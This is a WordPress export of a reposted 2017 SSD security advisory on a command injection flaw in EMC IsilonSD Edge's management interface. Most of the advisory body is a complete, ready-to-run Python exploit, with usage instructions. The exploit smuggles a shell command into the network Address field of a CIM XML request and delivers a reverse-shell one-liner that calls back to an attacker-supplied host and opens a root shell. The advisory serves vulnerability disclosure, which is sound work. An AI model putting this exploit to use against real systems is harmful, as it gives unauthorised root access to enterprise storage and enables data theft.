{"id":8221,"date":"2017-07-02T14:19:10","date_gmt":"2017-07-02T22:19:10","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/07\/02\/news-1996\/"},"modified":"2017-07-02T14:19:10","modified_gmt":"2017-07-02T22:19:10","slug":"news-1996","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/07\/02\/news-1996\/","title":{"rendered":"SSD Advisory \u2013 EMC IsilonSD Edge Command Injection"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 02 Jul 2017 08:09:16 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3252\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3252');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a Remote Command Injection vulnerability found in EMC IsilonSD Edge version 1.0.1.0005.<\/p>\n<p>IsilonSD Edge enables you to deploy industry leading scale-out NAS operating system using industry-standard hardware. Key benefits of IsilonSD Edge: Simple yet powerful and efficient scale-out storage solution for remote and branch offices, Easily extends your enterprise data lake from the core data center to edge locations and Enables consolidation and distribution of unstructured data<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Nahuel D. S\u00e1nchez from vvvSecurity, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> We have informed EMC of the vulnerability on the 24th of April 2017, the last email we received from them was on the 30th of May 2017. We have no further updates from EMC regarding the availability of a patch or a workaround for the vulnerability.<\/p>\n<p><span id=\"more-3252\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> A remote authenticated attacker can misuse IsilonSD management tools (located at https:\/\/<isilonsd_ip>:5480) to execute arbitrary OS commands. The vulnerability relies in the lack of backend validation when the network configuration if performed. There is some kind of front end validation which can be bypassed.<\/p>\n<p>If an attacker access the application and changes the hostname to something like &#8220;localhost; uname -a&#8221; the &#8220;uname -a&#8221; command will be executed with root privileges.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Reverse shell with root privileges will be triggered by this PoC.<\/p>\n<p>Execute the PoC as follows: <\/p>\n<p>python os_command_injection.py https:\/\/<ip>:5480 <host to receive the reverse shell> <port for the shell> administrator <administrator password><\/p>\n<p><u>os_command_injection.py<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5959715e393e0921888536\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import requests  import sys    from requests.auth import HTTPBasicAuth  from requests.packages.urllib3.exceptions import InsecureRequestWarning    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    if len(sys.argv) &lt;&gt; 6:      print &#8220;usage script.py &lt;target_url&gt; &lt;attacker_host&gt; &lt;attacker_port&gt; &lt;username&gt; &lt;password&gt;&#8221;      exit()    target_url = sys.argv[1]  attacker_host = sys.argv[2]  attacker_port = sys.argv[3]  username = sys.argv[4]  password = sys.argv[5]    headers = {&#8220;Content-Type&#8221;:&#8221;application\/xml; charset=UTF-8&#8243;, &#8220;Cache-Control&#8221;: &#8220;no-cache&#8221;, &#8220;CIMProtocolVersion&#8221;: &#8220;1.0&#8221;, &#8220;CIMOperation&#8221;: &#8220;MethodCall&#8221;, &#8220;CIMMethod&#8221;: &#8220;%53%65%74%564%41%6E%64%566%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67&#8221;, &#8220;CIMObject&#8221;: &#8220;%72%6F%6F%74\/%63%69%6D%762%3A%56%41%4D%49_%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67.%4E%61%6D%65%3D%22%65%74%680%22%2C%53%65%72%76%65%72%4E%61%6D%65%3D%22%6C%6F%63%61%6C%68%6F%73%74%22&#8243;}    shellcode = &#8221;&#8217;python -c &#8216;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#8220;%s&#8221;,%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&#8220;\/bin\/sh&#8221;,&#8221;-i&#8221;]);&#8217; &#8221;&#8217; % (attacker_host, attacker_port)    payload = &#8221;'&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt;  &lt;CIM CIMVERSION=&#8221;2.0&#8243; DTDVERSION=&#8221;2.0&#8243;&gt;&lt;MESSAGE ID=&#8221;11&#8243; PROTOCOLVERSION=&#8221;1.0&#8243;&gt;&lt;SIMPLEREQ&gt;&lt;METHODCALL NAME=&#8221;SetV4AndV6NetworkSetting&#8221;&gt;&lt;LOCALINSTANCEPATH&gt;&lt;LOCALNAMESPACEPATH&gt;&lt;NAMESPACE NAME=&#8221;root&#8221;\/&gt;&lt;NAMESPACE NAME=&#8221;cimv2&#8243;\/&gt;&lt;\/LOCALNAMESPACEPATH&gt;&lt;INSTANCENAME CLASSNAME=&#8221;VAMI_NetworkSetting&#8221;&gt;&lt;KEYBINDING NAME=&#8221;Name&#8221;&gt;&lt;KEYVALUE VALUETYPE=&#8221;string&#8221;&gt;eth0&lt;\/KEYVALUE&gt;&lt;\/KEYBINDING&gt;&lt;KEYBINDING NAME=&#8221;ServerName&#8221;&gt;&lt;KEYVALUE VALUETYPE=&#8221;string&#8221;&gt;localhost&lt;\/KEYVALUE&gt;&lt;\/KEYBINDING&gt;&lt;\/INSTANCENAME&gt;&lt;\/LOCALINSTANCEPATH&gt;&lt;PARAMVALUE NAME=&#8221;Address&#8221; PARAMTYPE=&#8221;string&#8221;&gt;&lt;VALUE&gt;192.168.1.162; %s&lt;\/VALUE&gt;&lt;\/PARAMVALUE&gt;&lt;PARAMVALUE NAME=&#8221;GatewayV4&#8243; PARAMTYPE=&#8221;string&#8221;&gt;&lt;VALUE&gt;192.168.1.1&lt;\/VALUE&gt;&lt;\/PARAMVALUE&gt;&lt;PARAMVALUE NAME=&#8221;SubnetMask&#8221; PARAMTYPE=&#8221;string&#8221;&gt;&lt;VALUE&gt;255.255.255.0&lt;\/VALUE&gt;&lt;\/PARAMVALUE&gt;&lt;PARAMVALUE NAME=&#8221;AddressVersions&#8221; PARAMTYPE=&#8221;string&#8221;&gt;&lt;VALUE&gt;STATICV4+AUTOV6&lt;\/VALUE&gt;&lt;\/PARAMVALUE&gt;&lt;\/METHODCALL&gt;&lt;\/SIMPLEREQ&gt;&lt;\/MESSAGE&gt;&lt;\/CIM&gt;&#8221;&#8217; % shellcode    try:      print &#8220;Launching exploit against %s&#8221; % target_url      print &#8220;Expecting to receive a reversel shell on host %s port %s&#8221; % (attacker_host, attacker_port)      print &#8220;After a few seconds check your netcat&#8230;&#8221;      res = requests.post(target_url + &#8220;\/cimom&#8221;, auth=(username, password), data=payload, headers=headers, verify=False)      if res.status_code == 401:          print &#8220;Invalid credentials were specified&#8221;      elif res.status_code &lt;&gt; 200:          print &#8220;There was an error&#8230;&#8221;          print res.status_code          print res.reason    except Exception as e:      print &#8220;There was an error&#8230;&#8221;      print e<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0153 seconds] -->  <\/p>\n<p><\/administrator><\/port><\/host><\/ip><\/isilonsd_ip><\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\" alt=\"Print Friendly\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3252\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 02 Jul 2017 08:09:16 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a Remote Command Injection vulnerability found in EMC IsilonSD Edge version 1.0.1.0005. IsilonSD Edge enables you to deploy industry leading scale-out NAS operating system using industry-standard hardware. Key benefits of IsilonSD Edge: Simple yet powerful and efficient scale-out storage solution for remote and branch offices, Easily extends your enterprise &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3252\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 EMC IsilonSD Edge Command Injection<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757],"class_list":["post-8221","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8221","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8221"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8221\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8221"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}